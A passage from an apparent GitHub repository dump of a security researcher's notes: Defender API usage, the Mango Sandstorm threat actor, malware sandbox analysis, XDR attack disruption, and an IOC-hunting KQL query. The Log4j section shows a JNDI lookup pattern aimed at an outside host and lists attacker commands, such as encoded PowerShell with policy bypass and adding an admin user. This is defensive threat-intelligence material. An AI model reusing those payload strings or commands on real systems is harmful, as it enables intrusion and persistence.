![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b0c876a5-9397-4582-954e-9e43bd2a4316) 21 | 22 | ### Second discovery ... different permissions 23 | Now we have discussed around three different advanced hunting-related APIs, but determining the appropriate API permissions can be confusing. 24 | As I've listed three different APIs, each requires different permissions. 25 | Therefore, depending on which API you're using ***(recommended using Microsoft Graph security API)***, you'll need to assign the appropriate permissions. 26 | 27 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/56163135-65a9-4f89-b6f2-57fe1919b865) 28 | 29 | This is the actual PowerShell script to demonstrate using the Advanced Hunting API, but I often notice mistakes due to incorrect API URLs. 30 | I've added three different API URLs for comparison purposes. 31 | - Code 34 - Microsoft Defender for Endpoint Advanced Hunting API 32 | - Code 37 - Microsoft Defender XDR Advanced Hunting API 33 | 34 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b2a18128-5261-4bb8-8d6e-8dd1ea93f871) 35 | 36 | - Code 44 - Microsoft Graph security API 37 | 38 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d1ef4746-8096-4dbb-b550-78ce61e4ea8c) 39 | 40 | ### Simulation 41 | As Advanced Hunting API shifts to using Microsoft Graph Security API, I've written a PowerShell script that utilizes Microsoft Graph Security API to perform advanced hunting and tagging to devices with Microsoft Defender for Endpoint API calls. 42 | 43 | - [x] [MDE-APIcallSimu.ps1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/MDE-APIcallSimu.ps1) is available from Security Research notes. 44 | 45 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4c746d54-bc96-46b5-9055-e350f2d24463) 46 | > Simulation : MDE-APIcallSimu.ps1 47 | 48 | ## Reference 49 | 1. [How to use tagging effectively (Part 3) - Scripting tags](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-3-scripting-tags/ba-p/1964073) 50 | 2. [The new Microsoft 365 Defender APIs in Microsoft Graph are now available in public preview!](https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/the-new-microsoft-365-defender-apis-in-microsoft-graph-are-now/ba-p/3603099) 51 | 52 | #### Disclaimer 53 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 54 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Attack techniques & insights 2 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 3 | 4 | |#|Title|About| 5 | |:---|:---|:---| 6 | | Part 1 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part1-Overview.md) | Mango Sandstorm overview | 7 | | Part 2 | Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md |August 25, 2022, Mango Sandstorm | 8 | | Part 3 | [Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) |April 7, 2023, Mango Sandstorm & Storm-1084 | 9 | 10 | ## August 25, 2022, Mango Sandstorm 11 | #### Short Summary 12 | Mango Sandstorm, previously known for using Log4j 2 exploits to attack VMware apps, has recently been targeting SysAid apps using the same technique. Once they gain initial access, the group establishes persistence, moves laterally within the network using custom and well-known hacking tools, and dumps credentials. 13 | 14 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f67bb7ac-2cc3-4a6e-ab31-06b8db9ce991) 15 | > [!Note] 16 | > [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 17 | 18 | 19 | ## Log4j 2 vulnerability 20 | As the Mango Sandstorm attack was initiated through the Log4j vulnerability, let's delve deeper into the attack and the vulnerability. 21 | 22 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49b682a4-10a9-4b9b-be53-a0c80e00d01b) 23 | > [Remediating the Log4j vulnerability](https://www.youtube.com/watch?v=ulOTK2pZLNU) | Microsoft Defender for Endpoint 24 | 25 | #### What is Log4j? 26 | Log4j is a widely used Java logging library that allows developers to log events and messages in their applications. It provides flexibility in categorizing and controlling logging output, enabling effective debugging and monitoring of applications. 27 | 28 | #### Why was Log4j 2 exploited? 29 | Log4j 2, an updated version of Log4j, is a widely used and powerful logging framework in Java. However, it had a critical vulnerability called Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832), ***which allowed attackers to remotely execute code by exploiting its deserialization functionality.*** 30 | 31 | #### How does the attacker precisely exploit the vulnerable Log4j 2? 32 | Attackers exploit vulnerable Log4j 2 systems by sending data containing a specific string. Log4j 2, while attempting to process this string, accesses ***a specified URL through the JNDI Lookup feature***. This allows attackers to download and execute malicious Java code within the system. 33 | > [!Note] 34 | > Java Naming and Directory Interface (JNDI)
35 | > It is a Java API that helps applications find and access data and resources using names. 36 | 37 | #### A specified URL? 38 | Here is the pattern of attack - **${indi:ldap//[attacker site]/a}** 39 | 40 | e.g. 41 | ``` 42 | ${indi:http//learningkijo.com/sub} 43 | ``` 44 | 45 | #### What commands were executed through the Log4j 2 exploit? 46 | ```cmd 47 | cmd.exe /C whoami 48 | cmd.exe /C powershell -exec bypass -w 1 -enc UwB…. 49 | cmd.exe /C hostname 50 | cmd.exe /C ipconfig /all 51 | cmd.exe /C net user 52 | cmd.exe /C net localgroup administrators 53 | cmd.exe /C net user admin * /add 54 | cmd.exe /C net localgroup Administrators admin /add 55 | cmd.exe /C quser 56 | ``` 57 | ## Reference 58 | 1. [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](https://www.microsoft.com/en-us/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/) 59 | 2. [Log4j (CVE-2021-44228) RCE Vulnerability Explained](https://www.youtube.com/watch?v=0-abhd-CLwQ) 60 | 61 | #### Disclaimer 62 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 63 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part2.md: -------------------------------------------------------------------------------- 1 | # Day 11 - XDR insights - File Analysis <1/2> 2 | In the previous blog, we explored fundamental malware analysis using Microsoft 365 Defender. Thanks to Microsoft 365 Defender, we obtained essential insights into the malware file and accurately identified its type. Ultimately, we revealed the malware's dropped files and IPs by leveraging deep analysis. 3 | 4 | Now, I'm excited to cover a much deeper exploration of deep analysis and PE analysis, leveraging the capabilities of third-party tools. 5 | 6 | > [!Note] 7 | > If you missed the chance to read Malware Analysis Part 1, here is [Day11-MalwareAnalysis-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md). 8 | 9 | ## Deep anaysis in MDE 10 | After [deep analysis](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-file-alerts?view=o365-worldwide#deep-analysis) unpacked the PE file in a cloud-based sandbox environment in MDE and provided a comprehensive report, I highlighted suspicious activities from the results. 11 | Concerning Command and Control (C2C) , we can observe that the Type A malware [supr.exe] attempts to access an external IP [40.9.74.80] via an HTTP request. 12 | While [13.107.4.50] appears to be a legitimate access point, it was flagged in VirusTotal. This suggests that the IP might be used as a legitimate remote access tool. 13 | 14 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ea8eb0ac-ac05-4e9a-901d-464e6c78e830) 15 | 16 | In terms of persistence, Type A [supr.exe] can create [oneet.exe] and set up a scheduled task to run [oneet.exe] every 1 minute. 17 | Additionally, [oneet.exe] initiates [cmd.exe] to control access to specific files and directories. 18 | 19 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8ecbdf02-7e61-48a2-b939-d25cffc6ec9b) 20 | 21 | 22 | ## ANY.RUN ? 23 | Any.Run is a tool that helps cybersecurity experts and researchers safely test and study malicious software (malware). 24 | It lets them see what the malware does without harming real computers. 25 | They can upload suspicious files or links, and Any.Run shows how the malware behaves in a safe environment, helping experts learn how to protect against it. 26 | 27 | Thanks to [Any.Run](https://app.any.run/tasks/7ad0e3c5-1617-437f-8cbb-700e40026cee/) and the Deep Analysis results, we can clearly see and understand how Type A [supr.exe] behaves during runtime. 28 | While we might have already gathered some insights from the Deep Analysis, Any.Run helps us visualize the logic of malware activities, such as the process tree. 29 | It allows us to sync each process with the process tree, especially in the case of C2C activities. 30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1cda860c-8263-480a-8fbb-4c1747404d1d) 32 | > ANY.RUN - Type A [supr.exe] process tree 33 | 34 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8a68527d-346d-42fa-a09b-518b7e9b25aa) 35 | > ANY.RUN - C2C activities 36 | 37 | ## Pestudio ? 38 | [Pestudio](https://www.winitor.com/download) is a software tool used for analyzing and inspecting executable files (programs). 39 | It provides information about these files, including details about their structure, imported and exported functions, embedded strings, and resources, among other aspects. In the cybersecurity field, Pestudio is utilized for static analysis, examining PE files without executing them. 40 | 41 | 42 | Based on PeStudio output, it appears that obfuscation techniques were used in the PE file. 43 | This includes the presence of a base64 string and the use of some suspicious APIs such as [MemoryStream](https://learn.microsoft.com/en-us/dotnet/api/system.io.memorystream?view=net-7.0) and [CheckRemoteDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-checkremotedebuggerpresent). 44 | 45 | Through Pestudio, I managed to gather insights about the content within the PE file that might not have been fully covered by MDE. 46 | While I didn't delve into every detail, the static analysis of PE file revealed signs of obfuscation and other interesting elements. 47 | 48 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3eaac226-4a09-4535-aa69-116d771eafb4) 49 | > Pestudio - Suspicous values from strings 50 | 51 | #### Disclaimer 52 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 53 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part1-Overview.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Overview 2 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 3 | 4 | |#|Title|About| 5 | |:---|:---|:---| 6 | | Part 1 | Day4-Mango-Sandstorm-Part1-Overview.md **** | Mango Sandstorm overview | 7 | | Part 2 | [Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md) |August 25, 2022, Mango Sandstorm | 8 | | Part 3 | [Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) |April 7, 2023, Mango Sandstorm & Storm-1084 | 9 | 10 | ## What is Mango Sandstorm ? 11 | Mango Sandstorm, formerly known as MERCURY, is ***an Iranian-based cyber activity group*** that specializes in sensitive data gathering through advanced cyber attacks, rather than financial gain. Their attack techniques include spear-phishing attacks, exploiting vulnerabilities, malware and social engineering. 12 | 13 | To get the detailed insight, Microsoft Defender Threat Intelligence also covers Mango Sandstorm's description, TTP, and IOCs. 14 | 15 | ![image](https://user-images.githubusercontent.com/120234772/235598610-51723cfb-b598-43bc-ac5c-2c344a384611.png) 16 | > Mango Sandstorm, Microsoft Defender Threat Intelligence 17 | 18 | ## Mango Sandstorm timeline 19 | #### August 25, 2022 20 | Mango Sandstorm, previously known for using Log4j 2 exploits to attack VMware apps, has recently been targeting SysAid apps using the same technique. Once they gain initial access, the group establishes persistence, moves laterally within the network using custom and well-known hacking tools, and dumps credentials. 21 | > [!Note] 22 | > [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 23 | 24 | 25 | #### April 7, 2023 26 | Mango Sandstorm, previously known for using Log4j 2 exploits and targeting on-premises environments, has now expanded its focus to include both on-premises and cloud environments. After gaining initial access through known vulnerabilities, the attack has been linked to Storm-1084 (formerly known as DEV-1084). 27 | > [!Note] 28 | > [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/) 29 | 30 | ## Mango Sandstorm associated groups 31 | There are several groups associated with APT29, and each group uses different attack techniques. 32 | - Earth Vetala 33 | - Mango Sandstorm (MERCURY) 34 | - Static Kitten 35 | - Seedworm 36 | - TEMP.Zagros 37 | - MuddyWater 38 | 39 | ## Mango Sandstorm attack techniques 40 | 41 | ### The most common attack techniques 42 | - Spear-phishing email 43 | - Use of cloud file-sharing services 44 | - Use of commercial remote access applications 45 | - Tooling: Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs 46 | - Exploiting vulnerabilities 47 | - Social engineering 48 | - Watering hole attacks 49 | - Backdoor installation 50 | - Lateral movement 51 | 52 | ### MITRE ATT&CK MuddyWater attack map 53 | ![image](https://user-images.githubusercontent.com/120234772/236394767-4a35fec6-0897-48ae-bfa3-e22db9a5a7ca.png) 54 | > MuddyWater, Techniques Used, [ATT&CK® Navigator](https://mitre-attack.github.io/attack-navigator/) 55 | 56 | 57 | ## Reference 58 | 1. August 25, 2022, [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 59 | 2. April 7, 2023, [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/) 60 | 3. [What is Microsoft Defender Threat Intelligence (Defender TI)?](https://learn.microsoft.com/en-us/defender/threat-intelligence/what-is-microsoft-defender-threat-intelligence-defender-ti) 61 | 62 | #### Disclaimer 63 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 64 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day06-M365D-XDR-AutomaticAttackDisruption.md: -------------------------------------------------------------------------------- 1 | # Day 6 - XDR automatic attack disruption 2 | Automatic attack disruption in Microsoft 365 Defender uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***. 3 | #### What is the objective of attack disruption? 4 | The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are two actions that can be taken: ***"device contain"*** by Microsoft Defender for Endpoint and ***"disable user"*** by Microsoft Defender for Identity. 5 | 6 | ## Advanced attacks vs XDR attack disruption 7 | Microsoft 365 Defender XDR provides coverage for the following three advanced attacks to disrupt further progression. 8 | 9 | 1. Adversary-in-the-middle attacks (AiTM) 10 | 2. Business email compromise (BEC) 11 | 3. Human-operated ransomware attacks 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4a26dc22-2a5a-4197-b000-8ceaa44f2111) 14 | > Automatic attack disruption, [Microsoft 365 Defender Blog](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) 15 | 16 | ## AiTM insights 17 | AiTM attack refers to ***"Adversary-in-The-Middle"*** phishing technique where attackers intercept communication between a user and a legitimate website, stealing passwords and session cookies to gain unauthorized access and perform fraudulent activities. 18 | 19 | #### MS security blogs : AiTM timeline 20 | 21 | - July 12, 2022, [From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 22 | - November 16, 2022, [Token tactics: How to prevent, detect, and respond to cloud token theft](https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/) 23 | - March 13, 2023, [DEV-1101 enables high-volume AiTM campaigns with open-source phishing kit](https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/) 24 | - June 8, 2023, [Detecting and mitigating a multi-stage AiTM phishing and BEC campaign](https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/) 25 | 26 | ## BEC insights 27 | Business Email Compromise (BEC) is a cyberattack where attackers deceive organizations through fraudulent emails. They impersonate trusted individuals to trick employees into taking unauthorized actions, such as transferring money or revealing sensitive information. BEC attacks can lead to financial losses and reputational damage for businesses. 28 | 29 | - May 6, 2021, [Business email compromise: How Microsoft is combating this costly threat](https://www.microsoft.com/en-us/security/blog/2021/05/06/business-email-compromise-how-microsoft-is-combating-this-costly-threat/) 30 | 31 | ## Human-operated ransomware insights 32 | Human-operated ransomware attacks, also known as ***"hands-on-keyboard"*** attack, refer to a specific type of ransomware attack where skilled human attackers actively participate in various stages of the attack rather than relying solely on automated tools or malware. 33 | 34 | - [Human-operated ransomware | Microsoft Learn](https://learn.microsoft.com/en-us/security/ransomware/human-operated-ransomware) 35 | - March 5, 2020, [Human-operated ransomware attacks: A preventable disaster](https://www.microsoft.com/en-us/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) 36 | 37 | ## MS blog - automatic attack disruption 38 | 1. [Automatic attack disruption in Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) 39 | 2. Feb 22 2023, [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) 40 | 3. Mar 08 2023, [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) 41 | 4. May 17 2023, [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751) 42 | 43 | 44 | 45 | #### Disclaimer 46 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 47 | -------------------------------------------------------------------------------- /CopilotLOGs/01-CopilotForSecurity-History.md: -------------------------------------------------------------------------------- 1 | # Microsoft Copilot for Security : LOG-01 2 | Welcome to my first log about Microsoft Copilot for Security. 3 | It has been one year since Microsoft announced Copilot. 4 | The purpose of this log is to catch up on the update histories of Microsoft Copilot for Security from its initial announcement to GA. 5 | 6 | ## History of first announcement to GA 7 | Microsoft Copilot for Security was announced on March 28, 2023 - [Introducing Microsoft Security Copilot: Empowering defenders at the speed of AI](https://blogs.microsoft.com/blog/2023/03/28/introducing-microsoft-security-copilot-empowering-defenders-at-the-speed-of-ai/ ) 8 | 9 | After almost one year, Microsoft announced that Microsoft Copilot for Security will be generally available worldwide on April 1, 2024 - [Microsoft Copilot for Security is generally available on April 1, 2024, with new capabilities](https://www.microsoft.com/en-us/security/blog/2024/03/13/microsoft-copilot-for-security-is-generally-available-on-april-1-2024-with-new-capabilities/) 10 | 11 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/bc4e8afc-676f-40e6-8d41-ea3485f5ca0e) 12 | 13 | ## Microsoft Security Blog 14 | For the past year, I have been reading numerous security blogs about Microsoft Copilot for Security, which has made me even more surprised and excited to try it out in real life. These blogs have been very helpful for catching up on topics like ***"Generative AI", "Microsoft Copilot for Security", "AI". "Open AI", "Chat GPT"*** and so on. 15 | 16 | | Date | Blogs | 17 | |:-----|:------| 18 | | March 28, 2023 | [Introducing Microsoft Security Copilot: Empowering defenders at the speed of AI](https://blogs.microsoft.com/blog/2023/03/28/introducing-microsoft-security-copilot-empowering-defenders-at-the-speed-of-ai/) | 19 | | March 28, 2023 | [With Security Copilot, Microsoft brings the power of AI to cyberdefense](https://news.microsoft.com/2023/03/28/with-security-copilot-microsoft-brings-the-power-of-ai-to-cyberdefense/) | 20 | | May 15, 2023 | [Microsoft Security highlights from RSA Conference 2023](https://www.microsoft.com/en-us/security/blog/2023/05/15/microsoft-security-highlights-from-rsa-conference-2023/) | 21 | | July 18, 2023 | [Microsoft Inspire: Partner resources to prepare for the future of security with AI](https://www.microsoft.com/en-us/security/blog/2023/07/18/microsoft-inspire-partner-resources-to-prepare-for-the-future-of-security-with-ai/) | 22 | | August 7, 2023 | [Microsoft AI Red Team building future of safer AI](https://www.microsoft.com/en-us/security/blog/2023/08/07/microsoft-ai-red-team-building-future-of-safer-ai/) | 23 | | October 19, 2023 | [Microsoft Security Copilot Early Access Program: Harnessing generative AI to empower security teams](https://www.microsoft.com/en-us/security/blog/2023/10/19/microsoft-security-copilot-early-access-program-harnessing-generative-ai-to-empower-security-teams/) | 24 | | November 8, 2023 | [Insights from Microsoft Security Copilot early adopters](https://www.microsoft.com/en-us/security/blog/2023/11/08/insights-from-microsoft-security-copilot-early-adopters/) | 25 | |November 15, 2023 | [Microsoft unveils expansion of AI for security and security for AI at Microsoft Ignite](https://www.microsoft.com/en-us/security/blog/2023/11/15/microsoft-unveils-expansion-of-ai-for-security-and-security-for-ai-at-microsoft-ignite/) | 26 | | December 6, 2023 | [Microsoft Security Copilot drives new product integrations at Microsoft Ignite to empower security and IT teams](https://www.microsoft.com/en-us/security/blog/2023/12/06/microsoft-security-copilot-drives-new-product-integrations-at-microsoft-ignite-to-empower-security-and-it-teams/) | 27 | | February 14, 2024 | [Microsoft Copilot for Security: The great equalizer for government security](https://www.microsoft.com/en-us/industry/blog/government/2024/02/14/microsoft-copilot-for-security-the-great-equalizer-for-government-security/) | 28 | | February 14, 2024 | [Staying ahead of threat actors in the age of AI](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/) | 29 | | February 21, 2024 | [Get the most out of Microsoft Copilot for Security with good prompt engineering](https://www.microsoft.com/en-us/security/blog/2024/02/21/get-the-most-out-of-microsoft-copilot-for-security-with-good-prompt-engineering/) | 30 | | February 22, 2024 | [Announcing Microsoft’s open automation framework to red team generative AI Systems](https://www.microsoft.com/en-us/security/blog/2024/02/22/announcing-microsofts-open-automation-framework-to-red-team-generative-ai-systems/) | 31 | | March 4, 2024 | [Defend against human-operated ransomware attacks with Microsoft Copilot for Security​​](https://www.microsoft.com/en-us/security/blog/2024/03/04/defend-against-human-operated-ransomware-attacks-with-microsoft-copilot-for-security/) | 32 | | March 13, 2024 | [Microsoft Copilot for Security: General Availability details](https://techcommunity.microsoft.com/t5/microsoft-security-copilot-blog/microsoft-copilot-for-security-general-availability-details/ba-p/4079970) | 33 | | March 13, 2024 | [Microsoft Copilot for Security is generally available on April 1, 2024, with new capabilities](https://www.microsoft.com/en-us/security/blog/2024/03/13/microsoft-copilot-for-security-is-generally-available-on-april-1-2024-with-new-capabilities/) | 34 | | March 15, 2024 | [Microsoft Copilot for Security generally available on April 1, with new capabilities](https://news.microsoft.com/en-cee/2024/03/15/microsoft-copilot-for-security-generally-available-on-april-1-with-new-capabilities/) | 35 | 36 | ***Source : https://www.microsoft.com/en-us/security/blog/*** 37 | 38 | #### Disclaimer 39 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 40 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Attack techniques & insights 2 | 3 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 4 | 5 | |#|Title|About| 6 | |:---|:---|:---| 7 | | Part 1 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part1-Overview.md) | Mango Sandstorm overview | 8 | | Part 2 | [ Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md) |August 25, 2022, Mango Sandstorm | 9 | | Part 3 | Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md |April 7, 2023, Mango Sandstorm & Storm-1084 | 10 | 11 | ## April 7, 2023, Mango Sandstorm 12 | 13 | #### Short Summary 14 | 15 | Mango Sandstorm, previously known for using Log4j 2 exploits and targeting on-premises environments, has now expanded its focus to include both on-premises and cloud environments. After gaining initial access through known vulnerabilities, the attack has been linked to Storm-1084 (formerly known as DEV-1084). 16 | 17 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ee623697-5a31-48fe-933a-85fa360ef3c1) 18 | 19 | > [!Note] 20 | > [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/) 21 | 22 | 23 | #### How has Mango Sandstorm changed compared to its previous activities? 24 | Previously, Mango Sandstorm was observed primarily in on-premise environments. However, they have now expanded their activities to include ***cloud environments*** as well. 25 | Additionally, there is strong suspicion that Mango Sandstorm is linked to ***Storm-1084***, according to Microsoft. 26 | 27 | 28 | #### What is Storm-1084? 29 | According to Microsoft, DEV-1084 publicly adopted the DarkBit persona and presented itself as a criminal actor interested in extortion. 30 | This was likely done as an attempt to obfuscate Iran's link to and strategic motivation for the attack. 31 | > [!Note] 32 | > DarkBit - a new ransomware 33 | 34 | #### Are there any evidences linking Storm-1084 to Mango Sandstorm? 35 | - The email's IP address (146.70.106[.]89) is linked to Mango Sandstorm. 36 | - Both were observed to use the same VPN service. 37 | - Both were observed to use the same tools such as Rport and Ligolo. 38 | - vatacloud[.]com, the command and control, used by Storm-1084, is controlled by Mango Sandstorm. 39 | 40 | #### How do they conduct attacks on on-premise environments? 41 | The initial access and lateral movement techniques employed in this attack are similar to the previous Mango Sandstorm technique. 42 | The attackers compromised the on-premise environment by leveraging Group Policy Objects (GPOs) to ***disable security tools like antivirus.*** 43 | They also used GPO to ***create a scheduled task for delivering ransomware.*** The ransomware payload was placed in the NETLOGON shares on domain controllers. 44 | Ultimately, the attackers encrypted files on targeted devices and left ransom notes. 45 | 46 | #### What types of attacks were conducted in the cloud environment? 47 | - Email impersonation 48 | - Email dump using Exchange Web Server API 49 | - Mass Azure resources deletion 50 | 51 | ## KQL : IoCs-Based Threat Hunting 52 | Here is an out-of-the-box KQL query to hunt for Mango SandStorm with Storm-1084. IOCs are available from Microsoft blog - [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/). 53 | #### IOCs csv file : [MangoSandstorm-Storm-1084-IOCs-042023.csv](https://github.com/LearningKijo/KQL/blob/main/KQL-XDR-Hunting/ThreatHunting/IOCs-Folder/MangoSandstorm-Storm-1084-IOCs-042023.csv) 54 | ```kql 55 | // IoCs - MERCURY and DEV-1084: Destructive attack on hybrid environment 56 | let MangoSandstorm = externaldata(Indicator:string, Type:string, Description:string) 57 | [@'https://raw.githubusercontent.com/LearningKijo/KQL/main/KQL-XDR-Hunting/ThreatHunting/IOCs-Folder/MangoSandstorm-Storm-1084-IOCs-042023.csv'] with (format='csv', ignorefirstrecord = true); 58 | let Domains = (MangoSandstorm | where Type == "Domain"| project Indicator); 59 | let IPaddress = (MangoSandstorm | where Type == "IP address"| project Indicator); 60 | let SHA256hash = (MangoSandstorm | where Type == "SHA-256"| project Indicator); 61 | (union isfuzzy=true 62 | (DeviceNetworkEvents 63 | | where Timestamp > ago(1d) 64 | | where RemoteUrl has_any (Domains) or RemoteIP in (IPaddress) 65 | | project Timestamp, DeviceId, DeviceName, ActionType, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName 66 | ), 67 | (DeviceFileEvents 68 | | where Timestamp > ago(1d) 69 | | where SHA256 in~ (SHA256hash) 70 | | project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256 71 | ), 72 | (DeviceProcessEvents 73 | | where Timestamp > ago(1d) 74 | | where SHA256 in~ (SHA256hash) 75 | | project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessCommandLine 76 | ), 77 | (DeviceImageLoadEvents 78 | | where Timestamp > ago(1d) 79 | | where SHA256 in~ (SHA256hash) 80 | | project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine 81 | ) 82 | ) 83 | ``` 84 | 85 | #### Disclaimer 86 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 87 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md: 